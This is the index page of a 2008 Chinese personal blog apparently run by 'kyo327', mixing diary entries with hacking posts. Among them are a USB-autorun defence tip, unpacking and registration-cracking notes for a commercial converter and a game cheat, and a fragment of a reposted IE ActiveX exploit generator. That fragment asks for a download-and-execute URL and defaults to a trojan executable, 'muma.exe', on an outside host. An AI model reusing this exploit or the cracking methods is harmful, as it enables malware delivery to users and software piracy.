< | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | > | >> View Mode: Normal | Topic List
转 Oracle web环境注射技术    [ Date: 2008-04-02 5:45:47 PM | From: Original ]
Oracle web环境注射技术
#
#BY 剑心
#http://www.loveshell.net
#

Read More...
Author: kyo327 | Category: 黑客技术文章 |  Comments: 2  |  TrackBack: 0  | Views: 814

北京的小雨    [ Date: 2008-03-28 6:38:40 PM | From: Original ]
今天北京下起了小雨,真是很难得啊.有好几个月都没有体验下雨是什么感觉了,甚是想念.不象在武汉,那雨多的让你烦,天天感觉都是粘济济的.偶尔来点小雨其实挺不错的,因为它可以阻止你出去玩,让你呆在家里有了充分的理由.然后在屋里看看电影,靠在床上翻翻书,其实也是其乐无穷.
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 7442

斯诺克中国公开赛    [ Date: 2008-03-28 6:31:12 PM | From: Original ]
2008年3月25日斯诺克中国公开赛 在北京大学生体育馆举行. 今天晚上丁俊晖以5:3险胜乔-佩里,这场比赛真是打的扣人心弦啊.
以前高中时期,我也很喜欢这项运动,那时打的还算可以,不过至今为止以有好几年没摸球杆了.现在只能欣赏这些高水平的比赛,不过好在仍然很有味道.这些天我要继续关注下去.
明天晚上7点半,世界排名第一的奥沙利文迎战中国香港的傅家俊,不能错过啊.



Read More...
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 12827

防止U盘病毒    [ Date: 2008-03-13 3:59:28 PM | From: Original ]
上个星期替同事去华夏银行做安全员时,给别人处理电脑病毒问题时,因为我U盘里有工具,所以准备插上U盘用工具查杀,想不到一插上去我的U盘全完了,所有文件全部感染,并且每个文件夹里也复制一个和文件夹名相同的病毒,我郁闷了,只好把U盘给格式化了.
其实就算你U盘没有写保护,你可以这样做:

当你双击U盘时却打不开,这是为什么呢,你那U盘肯定是中毒了,那么U盘的病毒又是从哪里来的呢? U盘对病毒的传播要借助autorun.inf文件的帮助。病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒。我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了。
  大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它。我提到的方法就是,在根目录下,删除autorun.inf文件。然后,根目下建立一个文件夹,名字就叫autorun.inf。这样一来,因为在同一目录下,同名的文件和文件夹不能共存的原理,病毒就无能为力,创建不了autorun.inf文件了。

Read More...
Author: kyo327 | Category: 黑客技术文章 |  Comments: 0  |  TrackBack: 0  | Views: 8301

这个礼拜闲时写了个crackme    [ Date: 2008-03-07 7:47:07 PM | From: Original ]
这个礼拜闲时写了个crackme.也是我的第四个crackme .

Click to Open in New Window

加了一点点anti 已经发到看雪了 不知道能坚持多久.
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 330

关于这礼拜    [ Date: 2008-03-05 11:48:23 AM | From: Original ]
公司同事有事回家了,银行那边的安全员的值班任务就交给我,让我顶两天.哪知作息不规律的坏习惯还没改过来致使我这几天极度的困倦.这还不算关键是受气.昨天竟然有个鸟人问我会不会装系统,要不要教教我,对于这种SB,我也懒得跟他废话,反正只是顶两天而已,忍忍就过了. 如果把我的工作安排成这样,一个月给我1万,我也不干.哎,这次郁闷的差使!!
另外这星期空闲时一直在琢磨我新构思的crackme,算法部分基本写完了.就剩下anti部分和文件完整性校验这块了,我想等完成了应该难度不小,呵呵.
不知何时心中产生一个想去德国旅游的想法,希望到高斯的墓前,在他正十七边形图案的碑前,向这位有史以来最伟大的数学家致敬.

Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 5876

无聊乱写    [ Date: 2008-02-21 12:03:32 AM | From: Original ]
除了象牛顿,高斯这样的极少数天才以外,我认为大多数人的资质基本上都是靠后天培养得来的。所以那些硕士和博士只类也和平常人没太大的区别,只不过是多学习了几年,而平常人只要肯去学亦可以的。而真正的差别就在于前者耐的住寂寞去学习了。一个人只要下决心去学习一个新知识应该都会学会的,关键就在于你愿不愿意去学。在我们从学校毕业后,可能有很大一部分人对学习感到陌生了,甚至在毕业后的很多年内学习新东西的时间加起来都不超过十天,我亦是如此。然而我突然的发现当你用较多时间学习新东西时效果却是惊人的。这时的你不会为了考试及格而学习,也不会为了拿到毕业证而学习,是真正对想学的东西感兴趣,或者想学习的东西对你工作有用而学习。
总而言之,这种差别就体现在惰性上,而这种惰性是广义的。体现在有技术含量的惰性和无技术含量的惰性是完全不一样的。说的通俗一点,有的人为了懒得走路而制造了自行车,而有的人为了懒得造自行车而依然还是步行,当然前者的惰性是值得提倡的。
另外我认为人也是生活在相对的社会圈子里的。很多言语都忽略了要对比的对象。比如我们说这个电脑贵了,我们说的生活过的差了,我们说工资拿的低了,其实言外肯定在自己的脑海里有一个对比对象的,只是我们都没有在意罢了。当然如果我们降低了对比对象的标准可能会给我们带来精神上的安慰,但你也许就失去了拼搏的激情,如果我们提高了对比对象的标准可能会给我们带来精神上的失落,但你也许就有了奋发向上激情。只要我们合适的调整我们脑海里的那个对比对象,就能控制自己的行为和情绪。只是如何去调整可能还要因人而宜。
给自己制定计划和目标应该是成功人士都具有习惯。我不敢相信没有任何计划和目标的人会在任何一方面获得成功。而计划这些东西不必写出来,自己在心里有个数即可,这点是很简单,难的是要按照定的计划去做。只有少数人去做了,那么成功只能从这少数人中再次挑选。
再说下"乐趣"。做什么事能给你带来乐趣其实是很值得研究的一个问题。我想没有人不希望自己快乐的活着。也许会有很多人提出来说赚钱能带来乐趣,为什么呢?因为有了钱就可以过上好生活,什么叫好生活?其实很多人的误区就在这里。好生活是指物质上和精神上都富裕,它可以等价于快乐的活着,但不等于赚钱。赚钱仅仅满足了好生活中的一个条件,而精神上愉快并非赚了钱就都能实现。因此可以提出来一个词语叫做快乐的赚钱,说的不那么物质一点就叫做快乐的工作。希望我们都能找到使自己快乐的工作,做自己感兴趣的事。
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 921

修鼠标记    [ Date: 2008-01-28 5:55:35 PM | From: Original ]
终于我的华硕本本的原配罗技鼠标生病了.感觉不算是大毛病,仅仅是左键的单击有可能会变成双击,也就是按键双击速度太快了,在控制面板里改成最慢也不起什么效果.我以为是里面进灰尘了,就想拆开给清理下,可我拧下了螺丝却怎么也打不开外壳.然后我索性不管了先凑合着用,不想给我捣腾了一下,现在左键单击也不灵了,单击五六次才有一次成功.这下我郁闷了,扔了重新买吧还真有点舍不得,毕竟是原配啊.于是我来到中关村修,好容易找到一个给修的地方还被奚落一句,犯得着修这小东西嘛.我也很尴尬. 那人拿去两三下就拆开了,然后说,修好二十.我同意了.我觉得就是里面进灰尘了,而他生怕在我看来他挣着二十块钱太容易了,就拿着电焊又找了小零部件焊来焊去,弄了大半天,就拿给我看要我测试,我一摸那左键就觉得不对劲,完全没有弹性了.测试了下当然是不行.看来这个鼠标至此是真正的死亡了.

我感到很郁闷.罗技也算是名牌了怎么质量这么差?仅仅半年多而已.算了随便买个便宜点用吧,就算坏了也不可惜.
于是买了一个可隐藏线的清华紫光的鼠标,很新鲜,呵呵.关键是携带方便.


Read More...
Author: kyo327 | Category: KYO--随笔 |  Comments: 1  |  TrackBack: 0  | Views: 8306

关于股票    [ Date: 2008-01-26 11:47:56 AM | From: Original ]
本来不想掺乎股票这个东西,可是她非要玩我也没办法.好在前段时间还赚了点.可现在这几日一直在跌,不知何时是个头.
我总觉得股票这东西只要你还有继续玩的意思你就不能说赚了,因为说不定哪天就又会把你赚的全部吐出来,所以还是不玩为好,或者说赚了一点以后就退出以后再不碰它.关键是大跌的时候给心理造成的影响太不好受.正事还忙不过来呢还操心那个事真不值得.
又不是少了那几个钱就活不下去,再说这种投资又不是100%的赚,是有风险的,何必担这个风险呢??
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 8973

这个价值5000元的jpg转pdf软件竟然是明码比较    [ Date: 2008-01-22 5:49:25 PM | From: Original ]
最近由于要翻译一篇英文资料.于是我用数码相机把它拍下来,又找了个jpg转PDF的软件,转换了下.可这软件要收费,还是5000大洋.
因此随便看了下注册机制,可谓漏洞百出.爆破,改注册表都可以成功.并且就算是分析算法也是明码.
不说了. 看图吧
Click to Open in New Window
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 15511

关于那个剑侠外挂模拟服务器    [ Date: 2008-01-22 3:57:31 PM | From: Original ]
关于那个剑侠外挂模拟服务器,我弄了个简陋的服务器界面,还算可以吧,呵呵.算是对模拟服务器的编写有了一定程度的认识.
这个暂时告一段落吧.发个截图看下.

Click to Open in New Window
Author: kyo327 | Category: 黑客技术文章 |  Comments: 0  |  TrackBack: 0  | Views: 310

说说这两天    [ Date: 2008-01-18 1:00:08 AM | From: Original ]
今天下雪了,确切的说应该是昨天,因为现在已是凌晨.出来的时候雪下的不小,走在路上我还不时的滑两下,不过找不到儿时的快乐了.只是觉得特别的冷.前段时间一直在看神探狄仁杰,上下两部共70集,好像没两个星期就看完了,然后就不知该做点什么才能使每天都有意义.
于是就找了个外挂练练手.试着破一破,了解下网络验证的基本过程.因此找了个比较简单的剑侠外挂,我之前有玩过这个金山出的游戏,还算可以吧.外挂加了个UPX压缩壳,估计作者也就是想让其体积缩小罢了.是用Borland C++ 1999写的.粗略的分析了下,以为比较简单.程序只send出来一个包给服务器,而服务器处理了这个包后,客户端又recv 一个包.这两个包里面的加密解密我大概搞懂后就开始着手写模拟服务器了.搞了一天终于使发包,处理包,收包都搞好了,但是仍然没验证成功.我想大概就只有那个随机数的问题了.难道那个我所认为的随机数不是随机的??我郁闷了半天,不过今天有点累了,等明天再接着分析那个所谓的随机数的生成过程吧.难道它的生成过程真的又有用户名来介入了????
Author: kyo327 | Category: KYO--随笔 |  Comments: 1  |  TrackBack: 0  | Views: 14271

易语言脱壳    [ Date: 2008-01-03 3:40:31 PM | From: Original ]
对于加了壳的易语言,由于其格式的特殊性,我们可以不用常规方法来脱.
首先,我们要请上E-Code Explorer,文件--进程中的程序.如果分析不出来,可 设置---分析设置---其他包含易格式的文件 顺便把 启动易格式捕捉者 选上.这样如果分析出来的话就可以按照下面一步步来了.
工具---易格式重定位信息修复.然后把00403000改为开始分析时的(疑似易格式基址).重定位完了后
接着
工具---导出易格式原体 这步相当于dump.保存为一个.ecf文件.

Read More...
Author: kyo327 | Category: 黑客技术文章 |  Comments: 0  |  TrackBack: 0  | Views: 4375

看雪exploit挑战赛    [ Date: 2008-01-02 2:37:54 PM | From: Original ]
下面这个是转来的

在学习ActiveX的时候读过联众的AX漏洞生成器,思路不错,但不知道什么原因,那个生成器的shellcode我并不能执行成功,索性将其shellcode与heap spray方法暴力分配内存的JS进行了修改,反正在我本机测试100%成功,XP SP2 IE6&IE7。
exeurl = InputBox( "Please input you want down&exec url:", "输入","http://fenggou.net/muma.exe" )
if exeurl <> "" then

Read More...
Author: kyo327 | Category: 黑客技术文章 |  Comments: 0  |  TrackBack: 0  | Views: 1712

Hidden: 一个星期又过去了......    [ Date: 2007-12-27 1:19:42 PM | From: Original ]
This is a Hidden Topic.
Author: kyo327 | Category: KYO--随笔 |  Comments: 0  |  TrackBack: 0  | Views: 5

< | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | > | >>
Here is kyo's blog © 2004-2005 
Processed in 0.078125 second(s)